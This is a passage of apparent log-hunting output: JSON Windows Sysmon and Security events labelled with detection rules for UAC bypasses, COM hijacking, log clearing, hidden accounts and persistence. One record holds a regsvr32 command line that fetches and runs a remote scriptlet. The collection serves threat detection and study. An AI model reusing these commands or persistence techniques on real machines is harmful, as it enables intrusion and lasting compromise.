Parameters"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-0A6F-5D1D-0000-0020CA350100","LogonId":"0x135ca","ParentCommandLine":"\"C:\\Windows\\system32\\notepad.exe\" ","ParentImage":"C:\\Windows\\System32\\notepad.exe","ParentProcessGuid":"365ABB72-1256-5D1D-0000-0010FB1A1B00","ParentProcessId":1632,"ProcessGuid":"365ABB72-1282-5D1D-0000-0010DD401B00","ProcessId":2328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-07-03 20:39:30.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8352,"Execution":{"#attributes":{"ProcessID":112,"ThreadID":2084}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-03T20:39:30.254733Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MemberName":"-","MemberSid":"S-1-5-21-3461203602-4096304019-2269080069-501","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"}},"EventID":4732,"EventRecordID":191029,"Execution":{"#attributes":{"ProcessID":624,"ThreadID":4452}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13826,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-22T11:22:05.201727Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MemberName":"-","MemberSid":"S-1-5-20","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"}},"EventID":4732,"EventRecordID":191030,"Execution":{"#attributes":{"ProcessID":624,"ThreadID":5108}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13826,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-22T11:23:19.251925Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":203050,"Execution":{"#attributes":{"ProcessID":744,"ThreadID":768}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-08T03:00:11.778188Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x218b896","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-500"}}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198242566,"Execution":{"#attributes":{"ProcessID":744,"ThreadID":3396}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-25T21:28:11.073626Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-14 22:22:21.503","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","UtcTime":"2019-06-14 22:22:21.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":7531,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:22:21.503995Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\",explorer.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"Persistence - Winlogon Shell","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell","UtcTime":"2019-06-14 22:22:21.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":7532,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:22:21.535245Z"}},"Version":2}}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E1D-5D04-0000-001003E70A00","ProcessId":1008,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:22:31.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7536,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":1916}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:22:31.957120Z"}},"Version":3}}}},{"detection":["Logon Scripts (UserInitMprLogonScript)","Suspicious Userinit Child Process"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"","Company":"","CurrentDirectory":"C:\\Windows\\system32\\","Description":"NpmTaskRunner","FileVersion":"1.0.0.0","Hashes":"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1E4A-5D04-0000-002013C00B00","LogonId":"0xbc013","ParentCommandLine":"C:\\Windows\\system32\\userinit.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","ParentProcessGuid":"365ABB72-1E51-5D04-0000-00104C340C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-1E51-5D04-0000-00107B380C00","ProcessId":3444,"Product":"NpmTaskRunner","RuleName":"","TerminalSessionId":2,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-14 22:23:13.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7556,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:23:13.957120Z"}},"Version":5}}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E54-5D04-0000-0010B7B30C00","ProcessId":1724,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:23:26.811"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7563,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:23:26.811612Z"}},"Version":3}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\regedit.exe","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-8DEC-5F00-0000-0010F0460800","ProcessId":5128,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.reg\\OpenWithList\\b","UtcTime":"2020-07-04 14:31:23.825"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306383,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:23.903600Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Count","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306384,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:26.838832Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DefaultInstall","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Section1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306385,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:26.849140Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\programdata\\gpo.inf","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306386,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:26.856657Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"c:\\windows\\tasks\\taskhost.exe\"","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\evasion\\a.exe","ProcessGuid":"747F3D96-8FD2-5F00-0000-0010C15D2200","ProcessId":3728,"RuleName":"Persistence - Hidden Run value detected","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\","UtcTime":"2020-07-04 14:18:58.231"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306346,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:18:58.268712Z"}},"Version":2}}}},{"detection":["Windows Registry Persistence COM Search Order Hijacking","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\ProgramData\\demo.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\InprocServer32\\(Default)","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":372,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-20 23:39:21.672","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\test.bat","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":373,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\User\\Documents\\mapid.tlb","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-4FED-5CE3-0000-001031174900","ProcessId":3808,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\{Default}","UtcTime":"2019-05-21 01:10:05.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":445,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T01:10:05.290459Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Apartment","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-5014-5CE3-0000-00105C444900","ProcessId":3860,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\ThreadingModel","UtcTime":"2019-05-21 01:10:44.797"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":447,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T01:10:44.807281Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"{49CBB1C7-97D1-485A-9EC1-A26065633066}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-501C-5CE3-0000-0010B5494900","ProcessId":2952,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs\\{Default}","UtcTime":"2019-05-21 01:10:52.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":449,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T01:10:52.468297Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"DFAE8213-832F-5CDD-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Windows\\System32\\osk.exe\" ","ParentImage":"C:\\Windows\\System32\\osk.exe","ParentProcessGuid":"DFAE8213-8B02-5CDD-0000-00109BCA0A00","ParentProcessId":1720,"ProcessGuid":"DFAE8213-8B08-5CDD-0000-001011CE0A00","ProcessId":3764,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-16 16:08:40.350"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18918,"Execution":{"#attributes":{"ProcessID":1744,"ThreadID":2120}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-16T16:08:40.360593Z"}},"Version":5}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"747F3D96-68DD-5FDD-0000-00101B660000","ProcessId":648,"RuleName":"Hidden Local Account Created","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)","UtcTime":"2020-12-18 17:56:07.015"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":596571,"Execution":{"#attributes":{"ProcessID":3552,"ThreadID":5004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-18T17:56:07.017817Z"}},"Version":2}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-B0EC-5CD9-0000-00201D340100","LogonId":"0x1341d","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-B0EC-5CD9-0000-0010D9D20000","ParentProcessId":944,"ProcessGuid":"365ABB72-B167-5CD9-0000-001062160C00","ProcessId":2476,"Product":"Microsoft® Windows® Operating 